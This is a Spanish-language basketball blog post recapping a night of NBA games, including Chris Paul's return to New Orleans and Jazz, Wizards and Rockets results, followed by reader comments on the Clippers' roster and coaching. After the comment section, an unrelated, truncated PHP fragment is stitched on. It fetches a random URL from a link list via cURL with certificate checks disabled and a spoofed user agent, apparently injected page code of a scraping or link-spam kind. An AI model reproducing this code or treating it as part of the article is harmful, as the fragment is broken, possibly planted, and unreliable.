La Crónica: Dura vuelta a casa

23 de March de 2012 por TheDeerHunter

Impresionante jornada y eso que el menú se presentaba flojito.

De entrada volvía Chris Paul a New Orleans. Cariñoso recibimiento en la grada, pero en la cancha le esperaba algo bien distinto. Confieso que no he visto muchos partidos de los Hornets, pero dudo que lo de anoche haya sido habitual. ¡Qué intensidad! ¡Qué agresividad! Jason Smith terminaba expulsado entre vítores tras haber estado a punto de enviar a Griffin al hospital. Los Clippers acongojados nunca supieron de dónde salía tal hostilidad. Tampoco es un equipo acostumbrado a esto. Tuvieron suerte, porque fue una barrida en todas las facetas de juego y sólo las pérdidas pudieron equilibrar el choque (90-97). En todo el curso a Griffin no le habían llovido boinas como las de anoche. De todo se aprende.

De infarto tuvimos dos choques de perfil bajo. Les ha sentado bien los cambios a los Wizards. Tanto como para poner a los Pacers bien contra las cuerdas. Hasta 22 puntos les llegaron a sacar y eso que Nené no tuvo precisamente su noche. Sin embargo aún les falta cocer e Indiana es un equipo con recursos. Chaparrón tras el descanso y remontada. Ojito al clutch de Wall… como para ponerse a hacer su bailecito después. Tiene que comer unos cuantos platos de lentejas todavía (85-83).

Mejor estuvo el Jazz@Kings. Los Jazz lanzados hacia playoffs y los Kings plantando cara de la buena. Tyreke sigue de 6º y podría haber optado al premio de haber empezado antes con esta estrategia. Su equipo parece salir beneficiado. Maravilloso duelo de hombres grandes, Jefferson vs Cousins, que terminó ganando el primero. Cómo está Favors también. Thornton no tuvo su mejor día pero a punto estuvo de resolver. Un palmeo ganador del omnipresente Jefferson lo impidió (103-102).

Terminando, sorpresón de los Blazers ante Memphis (93-97). Arenas no les ha traído fortuna, de momento. Importantísima victoria de los Celtics ante unos sólidos Bucks (100-91) y palizón de los Rockets a los Warriors (83-109), en el partido de su vida de Parsons.

En otro orden de cosas, Rudy al quirófano… y las Olimpiadas se complican cada día un poco más.

Premios

MVP: Los Jazz están on fire y buena culpa la tiene su juego interior liderado por Al Jefferson. Anoche se fue a los 30 puntos, 7 rebotes y 4 tapones y un palmeo suyo a falta de 0’9 segundos dio la victoria a su equipo.

Rookie: Chandler Parsons se confirma como una de las grandes sorpresas del draft. Asentado como titular, anoche disputó 36 minutos en los que anotó 20 puntos y capturó 11 rebotes. Y encima defiende como un jabato.

Sorpresa: Jason Smith le dio la noche a Blake Griffin. Además anotó 17 puntos y capturó 8 rebotes.

Decepción: 3ª derrota consecutiva para unos Clippers a los que asolan las dudas. Blake Griffin estuvo de nuevo aciego en el tiro (7 de 19 en tiros de campo y 7 de 13 en tiros libres).

Esfuerzo en vano: Pelearon duro los Kings para amarrar la victoria. Tyreke Evans, 25 puntos, 5 rebotes y 3 robos; Jason Thompson, 19 puntos y 15 rebotes. Al final no pudo ser. Marc Gasol también se quedó sin premios  a pesar de sus 22 puntos y 9 rebotes.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

14 comentarios a esta entrada

  1. Nacho dice:
    #1

    De momento Memphis no parece cuadrar el equipo tras la vuelta de Zach, creo que van 1 a 3, o 1 a 4 desde que el bueno de Randolph volvió a las canchas. Veremos si la dinámica cambia. Los sigo dando por la posible sorpresa de PO. Al ritmo que van las cosas se aventuran semis en el oeste brutales. OKH vs. MEM y SAS vs. LAL.
    Boston ya está a medio partido del cuarto puesto en el Este. Ojo con estos viejos, que pueden poner en problemas a cualquiera de los dos gallitos. Igual los de NY me callan la boca, pero yo sigo apostando por Millwake. Creo que el subidón post D’Antoni acabará descendiendo.

      Citar

  2. Esteban dice:
    #2

    Nacho:
    De momento Memphis no parece cuadrar el equipo tras la vuelta de Zach, creo que van 1 a 3, o 1 a 4 desde que el bueno de Randolph volvió a las canchas. Veremos si la dinámica cambia. Los sigo dando por la posible sorpresa de PO. Al ritmo que van las cosas se aventuran semis en el oeste brutales. OKH vs. MEM y SAS vs. LAL.
    Boston ya está a medio partido del cuarto puesto en el Este. Ojo con estos viejos, que pueden poner en problemas a cualquiera de los dos gallitos. Igual los de NY me callan la boca, pero yo sigo apostando por Millwake. Creo que el subidón post D’Antoni acabará descendiendo.

    pensae que al inciio de la temporada, algunos decian que menphis no cuajaba por rudy gay, por lo hecho en PO el año pasado, ahora parece no cuajar por zach por lo hecho por los de hollins durante su lesion

    ni uno ni otro es el problema, cuando estan solos revientan, pero juntos parece que no se terminan de sentir comodos relegando protagonismo

    en los clippers me gustaria ver a D`antoni en el banco, creo que es una plantilla muy parecida a la de los suns que podrian hacer brillar el italiano

    por ultimo, como es menostreciado jefferson, un supuesto-hace-numeros, PERO QUE NUMEROS!!! un centro con esa calidad deberia ser fichado este año por algun equipo con aspiraciones

      Citar

  3. Ru dice:
    #3

    Yo después de lo de D’Antoni en los Knicks no lo veo en Clippers ni en ningún equipo que tenga demasiada exigencia sobre sus hombros,y no nos engañemos,los Clippers están exigidos y suena a premio menor meterse en PO.No sé,yo la verdad de entrenadores y sus particulares “abc” salvo los muy míticos no tengo ni idea de su estilo,pero Byron Scott -actual entrenador de Cavaliers- o Sloan me suenan más atractivos para un hipotético reemplazo de Vinny.

      Citar

  4. Esteban dice:
    #4

    ayer pensaba en sloan, me suena rarisimo verlo en otro equipo que no sea utha, pero si que les daria el salto que necesitan los clippers

      Citar

  5. nba dice:
    #5

    Que opinais de las ultimas faltas a Griffin??, parece que los centers rivales se han propuesto que no llegue sano a los playoffs ?, who’s next…

      Citar

  6. Sancho88 dice:
    #6

    jeje, está claro que hacerle falta a Griffin es más rentable que dejar que te machaque. Haq a Griffin, y mientras siga sin postear, es decir, sin saber jugar de espaldas al aro, le seguirá ocurriendo lo mismo. Solo juega bien de frente al aro, y un tipo jugando en su posición debe saber sacar ventajas. En mi opinión, no aprovecha su físico ni a un 50%, a pesar de lo que pueda parecer. Y por cierto, el top-4 en Fiba son dobles. No vale tirarse el balón contra el tablero y después volver a coger tu propio rebote para anotar. Doble regate (dobles), oficialmente

      Citar

  7. Jose Luis dice:
    #7

    Sí que vale, si no pisas (Kobe Move)

      Citar

  8. Jose Luis dice:
    #8

    En este caso no vale, por aclarar, no se malinterprete mi comentario.

    Y cada vez veo más claro a los Clippers fuera en primera ronda

      Citar

  9. Nacho dice:
    #9

    Yo siempre he visto a los Clippers fuera de primera ronda. Ahora los empiezo a ver fuera de PO. Como no espabilen… por detrás aprietan fuerte, y con los Jazz, cuidadín, el que tontee (y meto aquí a Denver, Clippers Mavericks y Rockets) se queda con la cara de tonto.

      Citar

  10. Jose Luis dice:
    #10

    http://www.tubasket.com/noticia/nba/terremoto-angeles-clippers-jugadores-quieren-echar-al-entrenador-vinny-negro/1422371/105

    Ya me está empezando a dar un poco de asco esto… ¿que se creen los jugadores? primero Anthony buscando la revolución, aunque al final D’Antoni se fue porque no le cambiaron por Deron, y ahora estos igual… Y el mismo perfil, estrellita que va a un equipo, ve que va un poco mal la cosa y en lugar de pensar que puede ser su culpa (Paul ha salvado algún partido al final, pero por lo demás poco, y Griffin para qué hablar) pues nada, echamos al entrenador, sacrificamos 4 o 5 victorias para que le echen, y listo… Lo de McMillan no sé si fue así, no estoy tan informado. Creo que ya se acabó su tiempo allí, un ciclo bueno, pero que las lesiones lastraron, y espero que encuentre trabajo rápido porque a mí me parecía bueno… ¡que rocosos han sido los Blazers pese a todo!

    Y vale que Del Negro no es santo de mi devoción (ni de mucha gente creo) pero ya está bien con los jugadores hombre… cada vez se parece más esto al fútbol, que coraje, con lo bien organizada que está la NBA.

      Citar

  11. Sancho88 dice:
    #11

    Hombre, a los Mavs no les veo fuera, ni por progresión, ni por impresiones. Temporada irregular la suya, pero con tendencia a mejorar, más que a empeorar. Los Nuggets también es muy difícil que se caigan de la lucha, pues con Chandler en el equipo, Magee que lo está haciendo muy bien, y el equipo que tienen, no les veo sufriendo demasiado. Y luego hay un trío de equipos, que tendrán sus opciones por quedarse fuera. De estos tres, el que veo más sólido es Houston, porque nunca les puedes dar por muertos, jamás se rinden, y siempre están en playoffs. Y además, en un momento dado volverá Lowry incluso forzando su recuperación si la cosa se aprieta…
    Por tanto, la octava plaza está, a mi juicio, entre Jazz y Clippers, con cierto favoritismo para Clippers, porque hasta ahora están haciendo una buena temporada, en términos generales, y tienen más calidad que Jazz, aunque mucho menos oficio como equipo. Es una pena que uno se tenga que quedar fuera, porque en el Este… (coño, todos los años decimos esta frase, jeje). Jazz están atravesando una buena racha, pero solo entrarán si alguno de estos se despistan, y creo que excepto Clippers, los demás son miembros casi seguro de postemporada. La movida de los Clippers es que no tienen la excusa de ningún lesionado ni nada por el estilo. Símplemente no funcionan… X-Files

      Citar

  12. Jose Luis dice:
    #12

    Y eso que el equipo no da para más:

    Jordan, un 7 pies y poco más.
    Griffin, ala pívot potente pero con poco juego, un así top 15 en su puesto.
    Butler, que está bastante pasadete
    Young, un escolta tirador que no toma muy buenas decisiones.
    Paul, top 5 en bases, pero no anota lo suficiente (a mi parecer).

    En el banco solo se salvan Martin, Bledsoe, Mo Williams y Foye en algunos partidos, mal configurada la plantilla, pero bueno.

      Citar

  13. Esteban dice:
    #13

    Jose Luis:
    Y eso que el equipo no da para más:

    Jordan, un 7 pies y poco más.
    Griffin, ala pívot potente pero con poco juego, un así top 15 en su puesto.
    Butler, que está bastante pasadete
    Young, un escolta tirador que no toma muy buenas decisiones.
    Paul, top 5 en bases, pero no anota lo suficiente (a mi parecer).

    En el banco solo se salvan Martin, Bledsoe, Mo Williams y Foye en algunos partidos, mal configurada la plantilla, pero bueno.

    de lo mal configurada que esta la plantilla me eh cansado de decirlo, pero creo q tengo una razon

    los clippers habian armado uno de lso equipos mas compensados de toda la nba:

    mo-bledsone (ficharon a billups cuando este se lesiono
    gordo-foye
    butler-aminu-gomes
    griffin- kaman
    jordan- cook
    kaman les daria descanso a los dos internos y rotaria con ellos, estilo lamar odom en lakers con pau y bynum, para mi era un equipo muy bien armado, con futuro incluso, pero para pelear por la octava plaza del oeste

    luego vino el trade de pau, donde se desprendieron de jugadores en posiciones que no debian sin reemplazarlos bien y llego billups, LO CIERTO QUE ESER TRADE LOS HIZO UN EQUIPO ENTERO DE PO, Y QUIZA CANDIDATOS A FINAL DE CONFERENCIA, pero quedaron asi:

    cp3-billups-mo-bledsone
    foye
    bulter-gomes
    griffin-evans
    jordan-cook,despues martin

    se llenaron de bases, y del negro encontro en billups la solucion jugando de escolta y en Mo, un sexo hombre para jugar tanto de base como de escolta, y evans jugando de ala pivote y de pivote, gracias a esos buenos inventos los clippers estaban bien posicionados, pero era logico que alguna lesion los sacaria de carrera, de cualquiera de sus titulares, de cualquiera de los 5

    la razon del mal armado, fue el tiempo en que se hizo el trade por paul, casi con todos los jugadores con contratos firmados, por que sino tranquilamente podrian haber intentado fichar a mc grady o a radmanovic por el minimo y hubiesen servido aunque ya habian firmado con atlanta, o por 2 millones hacerse de stevenson que ya estaba en los nets, o con el mismo carter o yi que firmaron por poco en dallas,

    en fin el trade de pau los posiciono bien es cierto, pero se desarmaron mucho y en un mal momento, tan malo que no habia jugadores disponibles para fichar en los puestos de escolta, alero suplente o un interno con cierto poder de gol, pasaron de iun equipo con jugadores parejos y muy profundo, a un equipo con 4 estrellas y sin profundidad

    jordan- kaman

      Citar

  14. Ru dice:
    #14

    Jose Luis:
    http://www.tubasket.com/noticia/nba/terremoto-angeles-clippers-jugadores-quieren-echar-al-entrenador-vinny-negro/1422371/105

    Ya me está empezando a dar un poco de asco esto… ¿que se creen los jugadores? primero Anthony buscando la revolución, aunque al final D’Antoni se fue porque no le cambiaron por Deron, y ahora estos igual… Y el mismo perfil, estrellita que va a un equipo, ve que va un poco mal la cosa y en lugar de pensar que puede ser su culpa (Paul ha salvado algún partido al final, pero por lo demás poco, y Griffin para qué hablar) pues nada, echamos al entrenador, sacrificamos 4 o 5 victorias para que le echen, y listo… Lo de McMillan no sé si fue así, no estoy tan informado. Creo que ya se acabó su tiempo allí, un ciclo bueno, pero que las lesiones lastraron, y espero que encuentre trabajo rápido porque a mí me parecía bueno… ¡que rocosos han sido los Blazers pese a todo!

    Y vale que Del Negro no es santo de mi devoción (ni de mucha gente creo) pero ya está bien con los jugadores hombre… cada vez se parece más esto al fútbol, que coraje, con lo bien organizada que está la NBA.

    Es totalmente cierto,ya vemos eso de hacer la cama” tan manido en el fútbol en la NBA.No sé si hay precedentes anteriores pero desde Deron cargándose a un mito para los Jazz como Sloan estamos entrando en una dinámica peligrosa,donde las nuevas generaciones se creen estrellas y no se ponen a disposición de su guía -entrenador-,todo lo contrario.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>